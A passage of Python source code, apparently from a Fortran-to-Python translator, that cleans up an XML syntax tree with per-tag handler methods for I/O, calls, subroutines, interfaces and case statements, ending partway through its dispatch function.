cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.index_range_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_index_variable_or_range: "{child.tag}"' \
f' not handled'
else:
if traverse > 1:
_ = ET.SubElement(
current, child.tag, child.attrib
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_index_variable_or_range: Empty ' \
f'"{child.tag}" not handled'
def handle_tag_bound(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
        between the bound (lower-bound/upper-bound) elements.
        <lower-bound> or <upper-bound>
        </lower-bound>    </upper-bound>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.bound_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if (
child.tag == "name"
and self.need_reconstruct
):
self.reconstruct_name_element(cur_elem, current)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_upper_bound: "{child.tag}" not handled'
else:
if traverse > 1:
_ = ET.SubElement(
current, child.tag, child.attrib
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_upper_bound: Empty "{child.tag}" not ' \
f'handled'
def handle_tag_subscripts(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the subscripts elements.
<subscripts>
</subscripts>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "subscript":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In self.handle_tag_subscripts: "{child.tag}" not ' \
f'handled'
def handle_tag_subscript(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the subscript elements.
<subscript>
</subscript>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.subscripts_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In self.handle_tag_subscript: "{child.tag}" not ' \
f'handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# If current subscript is for a function caller and
# current element (argument) is an array, then store
# it into the caller_arr_arguments map for later use
if (
self.call_function
and (cur_elem.tag == "name"
and cur_elem.attrib['is_array'] == "true")
):
assert (
"fname" in parent.attrib
), "If this subscript is for the caller argument,\
fname must exist in the parent"
fname = parent.attrib['fname']
arg = cur_elem.attrib['id']
if fname in self.caller_arr_arguments:
self.caller_arr_arguments[fname].append(arg)
else:
self.caller_arr_arguments[fname] = [arg]
def handle_tag_operation(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the operation elements.
<operation>
</operation>
"""
for child in root:
self.clean_attrib(child)
# A process of negating the operator during goto elimination
if (
child.tag == "operator"
and self.need_op_negation
):
child.attrib['operator'] = \
syntax.NEGATED_OP[child.attrib['operator']]
self.need_op_negation = False
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "operand":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if child.tag != "operator":
assert (
False
), f'In handle_tag_operation: "{child.tag}" not handled'
def handle_tag_operand(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the operand elements.
<operand>
</operand>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.operand_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_operand: "{child.tag}" not handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if (
child.tag == "name"
and self.need_reconstruct
):
self.reconstruct_name_element(cur_elem, current)
def handle_tag_write(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the write elements.
<write>
</write>
"""
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if (
child.tag == "io-controls"
or child.tag == "outputs"
):
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_write: "{child.tag}" not handled'
def handle_tag_io_controls(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the io-controls elements.
<io-controls>
</io-controls>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.text or len(child) > 0:
if child.tag == "io-control":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_io_controls: "{child.tag}" not handled'
def handle_tag_io_control(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the io-control elements.
<io-control>
</io-control>
"""
for child in root:
self.clean_attrib(child)
# To make io-control elements simpler, the code below
# will append io-control-spec's attributes to its
# parent (io-control). This will eliminate at least
# one recursion in translate.py to retrieve
# the io-control information
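# Minimal sketch of the effect (attribute names are only illustrative):
# <io-control><io-control-spec argName="UNIT"/></io-control> becomes
# <io-control argName="UNIT">...</io-control>, so translate.py can read
# the spec directly off the io-control element.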
if child.tag == "io-control-spec":
current.attrib.update(child.attrib)
if child.text:
cur_elem = ET.SubElement(current, child.tag, child.attrib)
if child.tag == "io-control" or child.tag == "literal":
self.parseXMLTree(child, cur_elem, current, parent,
traverse)
else:
assert False, f'In handle_tag_io_control: "{child.tag}" ' \
f'not handled'
else:
if child.tag == "literal":
_ = ET.SubElement(current, child.tag, child.attrib)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_io_control: Empty "' \
f'{child.tag}" not handled'
def handle_tag_outputs(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the outputs elements.
<outputs>
</outputs>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "output":
cur_elem = ET.SubElement(current, child.tag, child.attrib)
self.parseXMLTree(child, cur_elem, current, parent, traverse)
elif child.tag == "name":
self.parseXMLTree(child, current, current, parent, traverse)
else:
assert (
False
), f'In handle_tag_outputs: "{child.tag}" not handled'
def handle_tag_output(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the output elements.
<output>
</output>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.output_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "name" and self.need_reconstruct:
self.reconstruct_name_element(cur_elem, current)
else:
assert (
False
), f'In handle_tag_output: "{child.tag}" not handled'
def handle_tag_format(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the format elements.
<format>
</format>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "format-items":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if child.tag != "label":
assert (
False
), f'In handle_tag_format: "{child.tag}" not handled'
def handle_tag_format_items(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the format_items and its sub-elements
<format_items>
____<format_item>
____</format_item>
</format_items>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "format-items" or child.tag == "format-item":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_format_items: "{child.tag}" not handled'
def handle_tag_print(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the print tags.
<print>
</print>
"""
for child in root:
self.clean_attrib(child)
if child.tag != "print-stmt":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "outputs":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_print: "{child.tag}" not handled'
def handle_tag_open(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the open elements.
<open>
</open>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "keyword-arguments":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_open: "{child.tag}" not handled'
else:
if child.tag == "open-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_open: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_keyword_arguments(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between
the keyword-arguments and keyword-argument elements.
<keyword-arguments>
____<keyword-argument>
____</keyword-argument>
</keyword-arguments>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "keyword-argument"
or child.tag == "literal"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_keyword_arguments: "{child.tag}" not ' \
f'handled'
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_keyword_arguments: Empty elements ' \
f'"{child.tag}" not handled'
def handle_tag_read(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the read elements.
<read>
</read>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "io-controls"
or child.tag == "inputs"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_read: "{child.tag}" not handled'
else:
if child.tag == "read-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_read: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_inputs(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the inputs and input elements.
<inputs>
____<input>
____</input>
</inputs>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "input"
or child.tag == "name"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_input - {root.tag}: "{child.tag}" not ' \
f'handled'
else:
assert (
False
), f'In handle_tag_input - {root.tag}: Empty elements ' \
f'"{child.tag}" not handled'
def handle_tag_close(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the close elements.
<close>
</close>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "keyword-arguments":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_close: "{child.tag}" not handled'
else:
if child.tag == "close-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_close: Empty elements "{child.tag}"'
def handle_tag_call(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the call elements.
<call>
</call>
"""
self.call_function = True
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "name":
# fname: Function name
current.attrib['fname'] = child.attrib['id']
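# Illustrative example (statement is made up): for CALL crop_yield(rain, total)
# the <call> element gets fname="crop_yield", which handle_tag_subscript
# later uses to map any array arguments of this caller.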
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_call: "{child.tag}" not handled'
else:
if child.tag == "call-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_call: Empty elements "{child.tag}"'
# Update call function definition's arguments with array status
self.update_function_arguments(current)
# Update call function arguments with their types
update = False
arguments_info = []
self.update_call_argument_type(current, update, self.current_scope, arguments_info)
# If modules have been used in the current program, check for interface functions
# and replace function names, if necessary.
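# Hedged illustration (names are hypothetical): a call to a generic
# interface such as CALL interp(x_val) may be rewritten to the specific
# member (say, interp_real) whose recorded argument types match
# arguments_info.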
if self.used_modules:
self.replace_interface_function_to_target(current, arguments_info)
def handle_tag_subroutine(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the subroutine elements.
<subroutine>
</subroutine>
"""
self.argument_types[root.attrib['name']] = {}
self.current_scope = root.attrib['name']
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "body":
self.current_body_scope = cur_elem
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_subroutine: "{child.tag}" not handled'
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_subroutine: Empty elements "{child.tag}"'
# Updating the argument attribute to hold the type.
for arg in self.arguments_list[current.attrib['name']]:
if arg.attrib['name'] in self.argument_types[current.attrib['name']]:
arg.attrib['type'] = str(self.argument_types[current.attrib['name']][arg.attrib['name']])
# Add extra XMLs under the interface function names to hold the argument types.
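# Illustrative result (types and names assumed): the member's XML entry
# gains
#   <argument-types>
#     <argument-type type="INTEGER"/>
#     <argument-type type="REAL"/>
#   </argument-types>
# plus a num_args attribute, which interface resolution relies on later.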
for interface in self.interface_function_xml:
if current.attrib['name'] in self.interface_function_xml[interface]:
argument_types = ET.SubElement(
self.interface_function_xml[interface][current.attrib['name']],
"argument-types"
)
num_args = 0
for arg in self.arguments_list[current.attrib['name']]:
num_args += 1
argument_type = ET.SubElement(
argument_types,
"argument-type",
{"type": arg.attrib['type']}
)
self.interface_function_xml[interface][current.attrib['name']].attrib['num_args'] = str(num_args)
def handle_tag_arguments(
self, root, current, _, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the arguments.
<arguments>
</arguments>
"""
num_of_args = int(root.attrib['count'])
if self.is_interface_member:
if grandparent.tag == "subroutine":
for interface in self.interface_functions:
if (
grandparent.attrib['name'] in self.interface_functions[interface]
and interface in self.interface_xml
):
if (
"max_arg" not in self.interface_xml[interface].attrib
or ("max_arg" in self.interface_xml[interface].attrib
and int(self.interface_xml[interface].attrib['max_arg']) < num_of_args)
):
self.interface_xml[interface].attrib['max_arg'] = str(num_of_args)
else:
pass
else:
pass
else:
assert False, f"Currently, {grandparent.tag} not handled for interface."
for child in root:
self.clean_attrib(child)
if child.tag == "argument":
# Collect the argument names with None as an initial type.
# Types will be updated in handle_tag_variable.
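# Illustrative intermediate state (names made up):
#   self.argument_types == {"crop_yield": {"rain": None, "total": None}}
# before handle_tag_variable fills in the declared types.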
if grandparent.tag == "subroutine":
self.argument_types[grandparent.attrib['name']][child.attrib['name']] = None
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
# Set a default array status to False
cur_elem.attrib['is_array'] = "false"
else:
assert (
False
), f'In handle_tag_arguments: "{child.tag}" not handled'
def handle_tag_argument(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between the
argument.
<argument>
</argument>
"""
current.attrib['is_array'] = "false"
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
def handle_tag_if(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the if elements.
<if>
</if>
"""
if traverse == 1:
current.attrib['if-before-goto'] = \
str(self.if_appear_before_goto).lower()
condition = None
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if traverse == 1:
# Check and hold conditional operation for <goto-stmt>
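# Hedged example (code is made up): for IF (X .GT. 0) GOTO 100, the
# <header> holding the comparison is stashed in self.conditional_op,
# keyed by the statement's unique code, so goto elimination can reuse
# the condition when rebuilding the control flow.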
if child.tag == "header":
condition = child
elif child.tag == "body":
if "conditional-goto-stmt-lbl" in current.attrib:
if (
"type" not in child.attrib
or child.attrib['type'] != "else"
):
if (
condition is not None
and "code" in current.attrib
):
unique_code = current.attrib['code']
self.conditional_op[unique_code] = \
condition
else:
assert (
False
), f'In handle_tag_if: "{child.tag}" not handled'
else:
if child.tag == "if-stmt":
current.attrib.update(child.attrib)
elif child.tag == "body" and traverse > 1:
_ = ET.SubElement(current, child.tag, child.attrib)
else:
assert (
False
), f'In handle_tag_if: Empty elements "{child.tag}" ' \
f'not handled'
# If label appears before <goto>, mark <if>
# with goto-move to move it later (1st traverse)
if traverse == 1:
# Since label_after needs to be reconstructed first,
# we skip collecting the element if label_after is True.
# Then, once the reconstruction of label_after is done,
# we collect those reconstructed elements.
if self.label_before and not self.label_after:
current.attrib['goto-move'] = "true"
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(current)
if self.label_after:
if (
self.collect_stmts_after_goto
and "conditional-goto-stmt-lbl" not in current.attrib
and current.attrib['if-before-goto'] == "false"
):
current.attrib['goto-remove'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-goto'].append(current)
elif self.collect_stmts_after_label:
current.attrib['goto-remove'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-label'].append(current)
def handle_tag_stop(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the stop elements
<stop>
</stop>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "stop-code":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_stop: "{child.tag}" not handled'
def handle_tag_step(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the step elements.
<step>
</step>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "operation"
or child.tag == "literal"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_step: "{child.tag}" not handled'
else:
assert (
False
), f'In handle_tag_step: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_return(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the return and return-stmt elements.
However, since 'return-stmt' is an empty element
with no sub-elements, the function does not keep
the element, but moves its attributes to the parent
element, return.
<return>
</return>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "return-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_return: "{child.tag}" not handled'
def handle_tag_function(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the function elements.
<function>
</function>
"""
self.current_scope = root.attrib['name']
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "header":
self.is_function_arg = True
elif child.tag == "body":
self.current_body_scope = cur_elem
else:
assert (
False
), f'In handle_tag_function: "{child.tag}" not handled'
else:
if (
child.tag == "function-stmt"
or child.tag == "end-function-stmt"
or child.tag == "function-subprogram"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
else:
assert (
False
), f'In handle_tag_function: Empty elements "{child.tag}"'
def handle_tag_use(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the use elements.
<use>
</use>
"""
assert (
isfile(self.module_log_file_path)
), f"Module log file path must exist."
with open(self.module_log_file_path) as json_f:
module_logs = json.load(json_f)
file_to_mod_mapper = module_logs["file_to_mod"]
mod_to_file_mapper = module_logs["mod_to_file"]
self.module_summary = module_logs["mod_info"]
use_module = root.attrib['name']
self.used_modules.append(use_module.lower())
if use_module.lower() in mod_to_file_mapper:
use_module_file_path = mod_to_file_mapper[use_module.lower()]
if (
use_module_file_path[0] !=
self.original_fortran_file_abs_path
and use_module not in self.modules_in_file
):
self.module_files_to_process.append(use_module_file_path[0])
else:
# If module resides in the same file, we don't have to do
# anything. Handling for this case is already implemented in
# genPGM.py
pass
else:
pass
for child in root:
self.clean_attrib(child)
if child.tag == "use-stmt" or child.tag == "only":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_use: "{child.tag}" not handled'
def handle_tag_module(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the module elements.
<module>
</module>
"""
for child in root:
self.clean_attrib(child)
try:
_ = self.module_child_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_module: "{child.tag}" not handled'
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
self.modules_in_file.append(root.attrib["name"])
def handle_tag_initial_value(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the initial-value elements.
<initial-value>
</initial-value>
"""
for child in root:
self.clean_attrib(child)
if child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "literal" or child.tag == "operation":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_initial_value: "{child.tag}" not handled'
else:
if child.tag == "initialization":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_initial_value: Empty elements ' \
f'"{child.tag}"'
def handle_tag_members(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the members elements.
<members> or <member>
</members> </member>
"""
self.is_interface_member = True
for child in root:
self.clean_attrib(child)
try:
_ = self.members_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_members: "{child.tag}" not handled'
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# Re-initialize to false when exiting members
self.is_interface_member = False
def handle_tag_only(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the only elements.
<only>
</only>
"""
for child in root:
try:
_ = self.only_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_only: "{child.tag}" not handled'
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
def handle_tag_length(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the length elements.
<length>
</length>
"""
for child in root:
if child.tag in ["literal", "char-length", "type-param-value"]:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_length: "{child.tag}" not handled'
def handle_tag_interface(
self, root, current, parent, grandparent, traverse
):
"""This function handles rectifying the elements between
interface tag.
<interface>
</interface>
"""
self.is_interface = True
for child in root:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_interface: "{child.tag}" not handled'
self.interface_xml[self.cur_interface_name] = current
# Re-initializing for next interface use
self.cur_interface_name = None
self.is_interface = False
def handle_tag_select(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the select elements.
<select>
</select>
"""
for child in root:
self.clean_attrib(child)
if child.tag in self.select_child_tags:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_select: "{child.tag}" not handled'
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_select: Empty elements "{child.tag}"'
def handle_tag_case(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the case elements.
<case>
</case>
"""
for child in root:
self.clean_attrib(child)
if child.tag in self.case_child_tags:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_case: Empty elements "{child.tag}"'
def handle_tag_value_ranges(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the value-ranges elements.
<value-ranges>
</value-ranges>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "value-range":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_value_ranges: Empty ' \
f'elements "{child.tag}"'
def handle_tag_value_range(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the value-range elements.
<value-range>
</value-range>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "value":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
current.remove(cur_elem)
if len(root) == 1:
parent.remove(current)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_value_range: Empty elements ' \
f'"{child.tag}"'
def handle_tag_values(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the values elements.
<values>
</values>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "literal":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_values: Empty elements "{child.tag}"'
# For DATA statements, further indentation might be required
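# Sketch of the re-nesting below (tags are only illustrative): any child
# of <values> that itself has sub-elements is re-created (tag and
# attributes) under the most recent childless sibling, and the original
# flat copy is removed afterwards.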
target_child = None
delete_child = []
for child in current:
if len(child) == 0:
target_child = child
else:
cur_elem = ET.SubElement(
target_child, child.tag, child.attrib
)
delete_child.append(child)
for child in delete_child:
current.remove(child)
#################################################################
# #
# XML TAG PARSER #
# #
#################################################################
def parseXMLTree(
self, root, current, parent, grandparent, traverse
):
"""Recursively traverse through the nested XML AST tree and
calls appropriate tag handler, which will generate
a cleaned version of XML tree for translate.py.
Any new tags handlers must be added under this this function.
parseXMLTree
Arguments:
root: The current root of the tree.
current: Current element.
parent: Parent element of the current element.
grandparent: Parent of the parent element of the current element.
traverse: Keeps track of the traversal count.
Returns:
None
"""
if root.tag == "file":
self.handle_tag_file(root, current, parent, grandparent, traverse)
elif root.tag == "program":
self.handle_tag_program(root, current, parent, grandparent,
traverse)
elif root.tag == "header":
self.handle_tag_header(root, current, parent, grandparent, traverse)
elif root.tag == "specification":
self.handle_tag_specification(root, current, parent, grandparent,
traverse)
elif root.tag == "body":
self.handle_tag_body(root, current, parent, grandparent, traverse)
elif root.tag == "declaration":
self.handle_tag_declaration(root, current, parent, grandparent,
traverse)
elif root.tag == "type":
self.handle_tag_type(root, current, parent, grandparent, traverse)
elif root.tag == "variables":
self.handle_tag_variables(root, current, parent, grandparent,
traverse)
elif root.tag == "variable":
self.handle_tag_variable(root, current, parent, grandparent,
traverse)
elif root.tag == "statement":
self.handle_tag_statement(root, current, parent, grandparent,
traverse)
elif root.tag == "assignment":
self.handle_tag_assignment(root, current, parent, grandparent,
traverse)
elif root.tag == "target":
self.handle_tag_target(root, current, parent, grandparent, traverse)
elif root.tag == "value":
self.handle_tag_value(root, current, parent, grandparent, traverse)
elif root.tag == "names":
self.handle_tag_names(root, current, parent, grandparent, traverse)
elif root.tag == "name":
self.handle_tag_name(root, current, parent, grandparent, traverse)
elif root.tag == "literal":
self.handle_tag_literal(root, current, parent, grandparent,
traverse)
elif root.tag == "dimensions":
self.handle_tag_dimensions(root, current, parent, grandparent,
traverse)
elif root.tag == "dimension":
self.handle_tag_dimension(root, current, parent, grandparent,
traverse)
elif root.tag == "loop":
self.handle_tag_loop(root, current, parent, grandparent, traverse)
elif root.tag == "index-variable" or root.tag == "range":
self.handle_tag_index_variable_or_range(root, current, parent,
grandparent, traverse)
elif root.tag == "lower-bound" or root.tag == "upper-bound":
self.handle_tag_bound(root, current, parent, grandparent, traverse)
elif root.tag == "subscripts":
self.handle_tag_subscripts(root, current, parent, grandparent,
traverse)
elif root.tag == "subscript":
self.handle_tag_subscript(root, current, parent, grandparent,
traverse)
elif root.tag == "operation":
self.handle_tag_operation(root, current, parent, grandparent,
traverse)
elif root.tag == "operand":
self.handle_tag_operand(root, current, parent, grandparent,
traverse)
elif root.tag == "write":
self.handle_tag_write(root, current, parent, grandparent, traverse)
elif root.tag == "io-controls":
self.handle_tag_io_controls(root, current, parent, grandparent,
traverse)
elif root.tag == "io-control":
self.handle_tag_io_control(root, current, parent, grandparent,
traverse)
elif root.tag == "outputs":
self.handle_tag_outputs(root, current, parent, grandparent,
traverse)
elif root.tag == "output":
self.handle_tag_output(root, current, parent, grandparent, traverse)
elif root.tag == "format":
self.handle_tag_format(root, current, parent, grandparent, traverse)
elif root.tag == "format-items" or root.tag == "format-item":
self.handle_tag_format_items(root, current, parent, grandparent,
traverse)
elif root.tag == "print":
self.handle_tag_print(root, current, parent, grandparent, traverse)
elif root.tag == "open":
self.handle_tag_open(root, current, parent, grandparent, traverse)
elif root.tag == "keyword-arguments" or root.tag == "keyword-argument":
self.handle_tag_keyword_arguments(root, current, parent,
grandparent, traverse)
elif root.tag == "read":
self.handle_tag_read(root, current, parent, grandparent, traverse)
elif root.tag == "inputs" or root.tag == "input":
self.handle_tag_inputs(root, current, parent, grandparent, traverse)
elif root.tag == "close":
self.handle_tag_close(root, current, parent, grandparent, traverse)
elif root.tag == "call":
self.handle_tag_call(root, current, parent, grandparent, traverse)
elif root.tag == "subroutine":
